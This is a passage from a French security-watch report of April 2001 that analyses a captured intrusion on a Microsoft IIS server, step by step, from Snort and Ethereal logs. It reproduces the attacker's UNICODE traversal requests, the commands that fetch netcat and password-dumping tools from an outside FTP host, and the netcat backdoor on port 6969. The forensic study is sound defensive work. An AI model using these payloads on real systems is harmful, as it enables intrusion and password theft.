Veille Technologique Sécurité - cert devoteam

More documents

Recommendations

Info

Avril 2001 La recherche du mot ' GET ' permet de lister les commandes passées en exploitant la vulnérabilité 'UNICODE' dont nous pouvons constater quelles sont similaires aux commandes précédentes ! strings -a snort-0204@0117.log.gz | find "GET" (les doublons ont été éliminés de cet extrait) GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1 GET /guest/default.asp/.. GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun HTTP/1.1 GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\ cmd.exe +cmd1.exe HTTP/1.1 GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe ?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1 GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe ?/c+echo+johna2k+>>ftpcom HTTP/1.1 GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe ?/c+echo+haxedj00+>>ftpcom HTTP/1.1 GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe ?/c+echo+get+nc.exe+>>ftpcom HTTP/1.1 GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe ?/c+echo+get+pdump.exe+>>ftpcom HTTP/1.1 GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe ?/c+echo+get+samdump.dll+>>ftpcom HTTP/1.1 GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe ?/c+echo+quit+>>ftpcom HTTP/1.1 GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe ?/c+ftp+-s:ftpcom HTTP/1.1 GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe ?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1 Analyse de niveau "Réseau" (Durée approximative: 4 heures, tableau de synthèse compris) Pour aller plus en avant, l'analyse doit maintenant porter sur le contenu de chacun des paquets et nécessite donc l'utilisation d'EtherReal et des mécanismes de filtrages associés mais aussi une bonne 'dose' de patience pour démêler les fils de l'écheveau ! Sources Quatre sites dignes d'intérêt sont rapidement identifiés: www.nether.net, portail d'un fournisseur de comptes Internet gratuits 1Cust162.tnt13.stk3.da.uu.net (213.116.251.162), point d'accès du fournisseur UUNET freedu-12-26.libertysurf.se (212.139.12.26), point d'accès du fournisseur libertysurf ip60-156.hksp.net (202.85.60.156), dont le domaine appartient à une société basée à Hong Kong Notons que les systèmes situés derrière ces deux dernières adresses dynamiques sont totalement contrôlés par l'attaquant. Protocoles Un simple tri sur la colonne 'protocole' permet d'obtenir très rapidement une 'cartographie' des protocoles utilisés. Ce tri met en évidence la présence de six protocoles - HTTP, FTP, Diameter, X25 et Socks, Netbios - dont trois sont, a priori, inattendus. Force est de constater que les paquets associés proviennent pour la plupart du site à l'origine des connexions HTTP transportant les attaques 'VBA Shell' et 'UNICODE': 1Cust162.tnt13.stk3.da.uu.net Diameter [Paquet 0548] X25 [Paquet 4030] L'analyse du contenu des paquets montre que celuici est en réalité une requête HTTP POST contenant une attaque ! Rien ne permet d'identifier la cause de l'erreur: erreur de l'attaquant ou erreur de journalisation due à Snort. Socks [Paquets 5995 … 6059] Ici tout laisse supposer qu'il s'agit d'une connexion licite ou d'un leurre destiné à masquer le sondage des accès Socks. Les requêtes sont effectuées depuis un accès PPP swbell.net. Un second tri utilisant les fonctionnalités de filtrage permet de suivre le cheminement des connexions HTTP et FTP (filtre: 'http.request or ftp.request'). Les commandes passées sur le système attaqué via les vulnérabilités 'VBA Shell' et 'UNICODE' peuvent alors être étudiées en détail. Attaques Veille Technologique Sécurité N°33 Page 44/59 © APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001 Une synthèse commentée de la succession des principaux événements est proposée dans le tableau suivant établi à la suite d'une analyse des échanges menée en deux temps: - Parcours rapide et non directif ayant pour objectif d'identifier les grandes phases de l'attaque et les éléments associés: sources, protocoles, données caractéristique. Le tableau de synthèse est initialisé. - Parcours détaillé des trois grandes phases précédemment identifiées après élimination du bruit au moyen de filtres plus ou moins complexe: connexions licites, activités non liées au cœur de l'attaque. Le tableau est complété et affiné. Les trois phases identifiées sont dénommées, ci-après, 'Incident'. HEURE: 09h16 INCIDENT N°1 Une attaque est perpétrée depuis l'adresse 1Cust162.tnt13.stk3.da.uu.net Méthode Paquet Commande Commentaire UNICODE 117 Lecture BOOT.INI OK à la 4 ième variation HTTP 130 Sondage présence MSADC Erreur de frappe HTTP 140 Sondage présence MSADC pour attaque VBAShell MSADC est présent, HTTP 149 Sondage Fonction MSADC AdvancedFactory.Query Signature ADM!ROX!YOUR!WORLD UNICODE 161 DIVERS Sondage type de système VBAShell 182 201 220 239 258 277 296 299 340 - Shell(cmd /c echo johna2k > ftpcom) - Shell(cmd /c echo hacker2000 >> ftpcom) - Shell(cmd /c echo get samdump.dll >> ftpcom) - Shell(cmd /c echo get pdump.exe >> ftpcom) - Shell(cmd /c echo get nc.exe >> ftpcom) - Shell(cmd /c quit>> ftpcom) - Shell(cmd /c fto -s ftpcom -n www.nether.net) Exécution du script et connexion FTP - Shell(cmd /c pdump.exe >> new.pass) Délai 10s Un délai pour garantir la bonne terminaison du programme VBAShell 359 378 397 416 435 - Shell(cmd /c echo johna2k > ftpcom2) - Shell(cmd /c echo hacker2000 >> ftpcom2) - Shell(cmd /c put new.pass >> ftpcom2) - Shell(cmd /c quit>> ftpcom2) - Shell(cmd /c fto -s ftpcom2 -n www.nether.net) Première tentative visant à rapatrier des outils sur le système cible. L'attaque est infructueuse, l'authentification étant rejetée par www.nether.net Récupération des mots de passe acquis lors de l'étape précédente. Bien entendu, le fichier n'existe pas et la connexion ftp reste infructueuse, l'authentification étant toujours rejetée par www.nether.net Délai 18s Le temps de constater que le fichier n'est pas présent sur le compte johna2k ? VBAShell 518 - Shell(cmd /c fto 213.116.251.162) Vérification de la connectivité Diameter 548 - Shell(cmd /c echo open 213.116.251.162 > ftpcom) Une erreur de codage du paquet ! VBAShell 567 586 605 624 643 662 681 - Shell(cmd /c echo johna2k > ftpcom) - Shell(cmd /c echo hacker2000 >> ftpcom) - Shell(cmd /c echo get samdump.dll >> ftpcom) - Shell(cmd /c echo get pdump.exe >> ftpcom) - Shell(cmd /c echo get nc.exe >> ftpcom) - Shell(cmd /c quit>> ftpcom) - Shell(cmd /c fto -s ftpcom) Seconde tentative visant à rapatrier des outils sur le système cible. Le fichier ftpcom est incomplet et ne contient pas l'adresse du site ftp ! L'attaquant ne passe pas aveuglément à la seconde étape consistant à lancer l'un des programmes chargés car il contrôle le système situé derrière 213.116.251.162 Délai 1mn05s Le temps de constater qu'aucune connexion ftp n'est établie depuis la machine attaquée VBAShell 700 - Shell(cmd /c open 213.116.251.162) Une erreur de codage manifeste 719 - Shell(cmd /c echo johna2k >> sasfile) Troisième tentative sur un autre site dans 738 - Shell(cmd /c echo haxedj00 >> sasfile) un ordre légèrement différent mais encore 757 - Shell(cmd /c echo get pdump.exe >> sasfile) avec une erreur. La commande initiale 776 - Shell(cmd /c echo get samdump.dll >> sasfile) devrait être: 795 - Shell(cmd /c echo get nc.exe >> sasfile) echo open 213.116.251.162 > sasfile 813 - Shell(cmd /c quit>> ftpcom) et non 832 - Shell(cmd /c fto -s ftpcom) open 213.116.251.162 Délai 1mn29s La connexion ftp n'est toujours pas établie par la machine attaquée VBAShell 851 - Shell(cmd /c open 213.116.251.162) Cela devient lassant ! 870 - Shell(cmd /c echo johna2k >> sasfile) Troisième tentative sur un autre site dans 888 - Shell(cmd /c echo haxedj00 >> sasfile) un ordre légèrement différent mais 906 - Shell(cmd /c echo get pdump.exe >> sasfile) toujours avec la même erreur ! 924 - Shell(cmd /c echo get samdump.dll >> sasfile) 943 - Shell(cmd /c echo get nc.exe >> sasfile) 962 - Shell(cmd /c quit>> ftpcom) 981 - Shell(cmd /c fto -s ftpcom) Délai 38s Rapide changement de stratégie. L'attaquant n'a pas compris l'origine du problème 'ftp' !! UNICODE 991-4 cmd.exe /c copy c:\winnt\system32\cmd.exe cmd1.exe Le comportement de l'attaquant est 1004-7 cmd1.exe echo open 213.116.251.162 > ftpcom décidément incompréhensible: toutes les 1017-20 cmd1.exe echo johna2k >> ftpcom attaques UNICODE sont transmises en 1030-33 cmd1.exe echo haxedj00 >> ftpcom utilisant quatre variations, la dernière 1042-45 cmd1.exe echo get nc.exe >> ftpcom étant acceptée. Pourtant, les résultats de 1054-57 cmd1.exe echo get pdump.exe >> ftpcom la tentative d'acquisition du fichier 1067-70 cmd1.exe echo get samdump.dll >> ftpcom 'boot.ini' [Paquet 117] permettaient 1080-83 cmd1.exe echo quit >> ftpcom d'identifier la bonne variation. Une seule 1092-95 cmd1.exe fto -s ftpcom hypothèse: l'attaquant utilise un script 1100 Exécution du script et connexion FTP qu'il ne maîtrise pas ! Un 'professionnel' 1109 - Transfert nc.exe aurait adapté ce script afin de minimiser 1202 - Transfert pdump.exe les traces et d'optimiser l'attaque ! 1266 - Transfert samdump.dll Durée 2s L'attaquant n'attend pas la fin des transferts pour engager la seconde phase de l'attaque UNICODE 1233-36 cmd1.exe nc -l -p 6969 cmd1.exe Activation d'un accès caché sur TCP/6969 Veille Technologique Sécurité N°33 Page 45/59 © APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Page 1 and 2: APOGEE Communications Rapport de Ve
Page 3 and 4: Avril 2001 MICROSOFT 27 NCM 27 NETS
Page 5 and 6: Avril 2001 LES PRODUITS TELEPHONIE
Page 7 and 8: Avril 2001 LES TECHNOLOGIES SYSTEME
Page 9 and 10: Avril 2001 LES INFORMATIONS CERT IN
Page 11 and 12: Avril 2001 technologiques avec des
Page 13 and 14: Avril 2001 LES SERVICES DE BASE LOG
Page 15 and 16: Avril 2001 NORMES ET STANDARDS LES
Page 17 and 18: Avril 2001 Thème Nom du Draft Date
Page 19 and 20: Avril 2001 SIP draft-ietf-simple-im
Page 21 and 22: Avril 2001 IPv6, en l'absence d'une
Page 23 and 24: Avril 2001 FORMAT DE LA PRESENTATIO
Page 25 and 26: Avril 2001 Déni de service sur les
Page 27 and 28: Avril 2001 MICROSOFT Débordement d
Page 29 and 30: Avril 2001 WATCHGUARD Déni de serv
Page 31 and 32: Avril 2001 PGP Exposition de clé p
Page 33 and 34: Avril 2001 Reprise de l'avis CERT C
Page 35 and 36: Avril 2001 OpenBSD Disponibilité d
Page 37 and 38: Avril 2001 LINUX REDHAT Annonce de
Page 39 and 40: Avril 2001 MS00-098 Indexing Servic
Page 41 and 42: Avril 2001 y a quelques années ave
Page 43: Avril 2001 GET /guest/default.asp/.
Page 47 and 48: Avril 2001 NC 6969 3149 3163 'del s
Page 49 and 50: Avril 2001 Microsoft(R) Windows NT(
Page 51 and 52: Avril 2001 12/26/00 07:10p New Fol
Page 53 and 54: Avril 2001 C:\Program Files\Common
Page 55 and 56: Avril 2001 12/15/00 07:05p 673 lrfp
Page 57 and 58: Avril 2001 11/26/00 12:34p 0 AUTOEX
Page 59: Avril 2001 Conclusion 1. Deux vague

Veille Technologique Sécurité - cert devoteam

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?